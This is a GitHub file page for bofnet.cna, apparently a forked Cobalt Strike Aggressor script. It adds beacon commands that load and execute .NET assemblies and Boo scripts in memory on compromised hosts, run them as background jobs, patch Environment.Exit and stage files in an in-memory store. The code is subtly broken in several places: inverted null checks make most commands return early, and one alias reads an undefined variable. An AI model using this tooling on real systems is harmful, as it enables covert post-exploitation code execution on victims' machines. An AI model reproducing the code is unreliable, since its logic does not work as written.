forked from CCob/BOF.NET
-
Notifications
You must be signed in to change notification settings - Fork 18
Expand file tree
/
Copy pathbofnet.cna
More file actions
274 lines (213 loc) · 9.7 KB
/
bofnet.cna
File metadata and controls
274 lines (213 loc) · 9.7 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
# beacons
beacon_command_register("bofnet_init", "Initialize beacon ready to run BOFNET", "Synopsis: bofnet_init \nInitialize beacon ready to run BOFNET");
beacon_command_register("bofnet_shutdown", "Shutdown the BOFNET AppDomain", "Synopsis: bofnet_shutdown \nShutdown the BOFNET AppDomain");
beacon_command_register("bofnet_list", "List all executable BOFNET's available", "Synopsis: bofnet_list \nList all executable BOFNET's available");
beacon_command_register("bofnet_listassemblies", "List all loadded assembiles inside BOFNET", "Synopsis: bofnet_listassemblies \nList all loadded assembiles inside BOFNET");
beacon_command_register("bofnet_execute", "Execute a BOFNET class", "Synopsis: bofnet_execute class arg1 arg2 ...\nExecute's a BOFNET class along with all arguments supplied. Arguments with spaces should be quoted.\n");
beacon_command_register("bofnet_load", "Load a .NET assembly containing additional BOFNET classes", "Synopsis: bofnet_load assembly_path\nLoad a .NET assembly containing additional BOFNET classes\n");
beacon_command_register("bofnet_job", "Execute a BOFNET class as a background job in a seperate threead", "Synopsis: bofnet_job class arg1 arg2\nExecute a BOFNET class as a background job\n");
beacon_command_register("bofnet_jobs", "List active BOFNET background jobs", "Synopsis: bofnet_jobs\nList active BOFNET background jobs\n");
beacon_command_register("bofnet_jobstatus", "Dump the console buffer of an active BOFNET background job", "Synopsis: bofnet_jobstatus jobid\nDump the console buffer of an active BOFNET background job\n");
beacon_command_register("bofnet_jobkill", "Kills a running jobs thread (warning, could leave leaked resources/sockets behind", "Synopsis: bofnet_jobkill jobid\nKills a running jobs thread (warning, could leave leaked resources/sockets behind\n");
beacon_command_register("bofnet_boo", "Runs a Boo script in a temporary AppDomain which is then unloaded", "Synopsis: bofnet_boo filename.boo\nRuns a Boo script in a temporary AppDomain which is then unloaded\n");
beacon_command_register("bofnet_vfs_add", "Uploads a file to the in memory VFS storage", "Synopsis: bofnet_vfs_add local_path filename content_type\Uploads a file to the in memory VFS store\n");
beacon_command_register("bofnet_executeassembly", "Execute a standard .NET assembly calling the entry point (blocks until completion)", "Synopsis: bofnet_executeassembly assembly_name arg1 arg2 ...\nExecute a standard .NET assembly calling the entry point and passing all arguments supplied (blocks until completion)\n");
beacon_command_register("bofnet_jobassembly", "Execute a standard .NET assembly calling the entry point (as a background job)", "Synopsis: bofnet_jobassembly assembly_name arg1 arg2 ...\nExecute a standard .NET assembly calling the entry point and passing all arguments supplied (as a background job)\n");
beacon_command_register("bofnet_patchexit", "Re-patch .NET's Environment.Exit() to prevent exit", "Synopsis: bofnet_patchexit \nRe-patch .NET's Environment.Exit() to prevent exit");
sub readAllFileData {
$fileHandle = openf($1);
$fileData = readb($fileHandle, -1);
closef($fileHandle);
return $fileData;
}
sub addQuotes {
$result = "";
$idx = 0;
foreach $entry ($1){
$entry = matches($entry, '\s*(.*)')[0];
$result = $result . "\"$entry\"";
if($idx != size($1) - 1){
$result = $result . " ";
}
$idx++;
}
return $result;
}
sub loadBOFNativeRuntime {
$nativeBOFPath = script_resource('bofnet_execute.cpp.'.barch($1).'.obj') ;
if(-exists $nativeBOFPath){
return readAllFileData($nativeBOFPath);
}else{
blog($1, "[!] The BOFNET native runtime file $nativeBOFPath doesn't exist");
return $null;
}
}
sub bofnet_execute_raw{
$bofnetNative = loadBOFNativeRuntime($1);
if($bofnetNative != $null){
return;
}
beacon_inline_execute($1, $bofnetNative, "go", "$2\x00".$3);
}
# Not secure random string by any means!
sub generateRandomString {
$validChars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890";
$validCharsCount = strlen($validChars);
$randomString = "";
for( $idx = 0; $idx < $1; $idx++){
$randomString = $randomString . charAt($validChars, rand($validCharsCount));
}
return $randomString;
}
alias bofnet_init {
$bofnetNative = loadBOFNativeRuntime($1);
if($bofnetNative != $null){
return;
}
$bofnetRuntime = readAllFileData(script_resource('BOFNET.dll'));
btask($1, "Initializing BOFNET");
beacon_inline_execute($1, $bofnetNative, "go", "BOFNET.Bofs.Initializer\x00".$bofnetRuntime);
beacon_inline_execute($1, $bofnetNative, "go", "BOFNET.Bofs.PatchEnvironmentExit\x00");
}
alias bofnet_shutdown {
$bofnetNative = loadBOFNativeRuntime($1);
if($bofnetNative != $null){
return;
}
btask($1, "Shuting down BOFNET");
beacon_inline_execute($1, $bofnetNative, "go", "BOFNET.Bofs.Shutdown\x00");
}
alias bofnet_list {
$bofnetNative = loadBOFNativeRuntime($1);
if($bofnetNative != $null){
return;
}
btask($1, "Listing BOFNET classes");
beacon_inline_execute($1, $bofnetNative, "go", "BOFNET.Bofs.List\x00");
}
alias bofnet_listassemblies {
$bofnetNative = loadBOFNativeRuntime($1);
if($bofnetNative != $null){
return;
}
btask($1, "Listing loaded BOFNET assemblies");
beacon_inline_execute($1, $bofnetNative, "go", "BOFNET.Bofs.ListAssemblies\x00");
}
alias bofnet_execute {
$bofnetNative = loadBOFNativeRuntime($1);
if($bofnetNative != $null){
return;
}
$bofArguments = "\x00";
@argParts = sublist(@_,2);
if(size(@argParts) > 0){
$bofArguments = " ".addQuotes(@argParts)."\x00";
}
btask($1, "Attempting to execute BOFNET $2");
beacon_inline_execute($1, $bofnetNative, "go", $2.$bofArguments);
}
alias bofnet_load{
local('$assemblyData');
# 900k chunks sent to leave room for protocol data too
$chunkSize = 1024 * 900 ;
if(-exists $2){
$assemblyData = readAllFileData($nativeBOFPath);
}else{
blog($1, "[!] The file $2 doesn't seem to exist, missing quotes by any chance?");
return;
}
btask($1, "Attempting to load large .NET assembly $2 into BOFNET");
$rawData = readAllFileData($2);
$numChunks = strlen($rawData) / $chunkSize;
$remainder = strlen($rawData) % $chunkSize;
$id = generateRandomString(8);
for($i = 0; $i < $numChunks; $i++){
$chunk = substr($rawData, $i * $chunkSize, ($i * $chunkSize) + $chunkSize);
$assemblyData = bof_pack($1, "Zib", $id , $chunkSize, $chunk) ;
bofnet_execute_raw($1, "BOFNET.Bofs.AssemblyLoader", $assemblyData);
}
if($remainder > 0){
$chunk = substr($rawData, $numChunks * $chunkSize, ($numChunks * $chunkSize) + $remainder + 1);
$assemblyData = bof_pack($1, "Zib", $id , $chunkSize, $chunk) ;
bofnet_execute_raw($1, "BOFNET.Bofs.AssemblyLoader", $assemblyData);
}
}
alias bofnet_job {
$bofnetNative = loadBOFNativeRuntime($1);
if($bofnetNative != $null){
return;
}
$bofArguments = "\x00";
@argParts = sublist(@_,2);
if(size(@argParts) > 0){
$bofArguments = " ".addQuotes(@argParts)."\x00";
}
btask($1, "Attempting to start BOFNET $2 as a job");
beacon_inline_execute($1, $bofnetNative, "go", "BOFNET.Bofs.Jobs.JobRunner ".$2.$bofArguments);
}
alias bofnet_jobs {
fireAlias($1, "bofnet_execute", "BOFNET.Bofs.Jobs.JobList");
}
alias bofnet_jobstatus {
fireAlias($1, "bofnet_execute", "BOFNET.Bofs.Jobs.JobStatus ".$2);
}
alias bofnet_jobkill {
fireAlias($1, "bofnet_execute", "BOFNET.Bofs.Jobs.JobKill ".$2);
}
alias bofnet_boo {
local('$booCode @argParts $scriptArgs');
$booCode = readAllFileData($2);
$scriptArgs = "";
@argParts = sublist(@_,2);
if(size(@argParts) > 0){
$scriptArgs = addQuotes(@argParts);
}
$args = bof_pack($bid, "bZ", $booCode , $scriptArgs);
blog ($1, "Executing script $2 with the following arguments: $scriptArgs");
bofnet_execute_raw($1, "BOFNET.Bofs.Boo.BooRunner", $args);
}
alias bofnet_executeassembly {
$bofnetNative = loadBOFNativeRuntime($1);
if($bofnetNative != $null){
return;
}
$bofArguments = "\x00";
@argParts = sublist(@_,2);
if(size(@argParts) > 0){
$bofArguments = " ".addQuotes(@argParts)."\x00";
}
btask($1, "Attempting to start .NET assembly in blocking mode");
beacon_inline_execute($1, $bofnetNative, "go", "BOFNET.Bofs.ExecuteAssembly ".$2.$bofArguments);
}
alias bofnet_jobassembly {
$bofnetNative = loadBOFNativeRuntime($1);
if($bofnetNative != $null){
return;
}
$bofArguments = "\x00";
@argParts = sublist(@_,2);
if(size(@argParts) > 0){
$bofArguments = " ".addQuotes(@argParts)."\x00";
}
btask($1, "Attempting to start .NET assembly as a job");
beacon_inline_execute($1, $bofnetNative, "go", "BOFNET.Bofs.Jobs.JobRunnerAssembly ".$2.$bofArguments);
}
alias bofnet_patchexit {
$bofnetNative = loadBOFNativeRuntime($1);
if($bofnetNative != $null){
return;
}
btask($1, "Re-patching .NET Environment.Exit()");
beacon_inline_execute($1, $bofnetNative, "go", "BOFNET.Bofs.PatchEnvironmentExit\x00");
}
alias bofnet_vfs_add{
local('$fileData $args');
if(size(@_) != 4){
blog($1, "[!] Usage: bofnet_hostfile local_path hosting_filename content_type");
return;
}
$fileData = readAllFileData($2);
$args = bof_pack($1, "bZZ", $fileData , $3, $4);
blog($1, "Attempting to host file $2 (" . strlen($fileData) . " bytes) inside the BOFNET VFS");
bofnet_execute_raw($1, "BOFNET.Bofs.VFS", $args);
}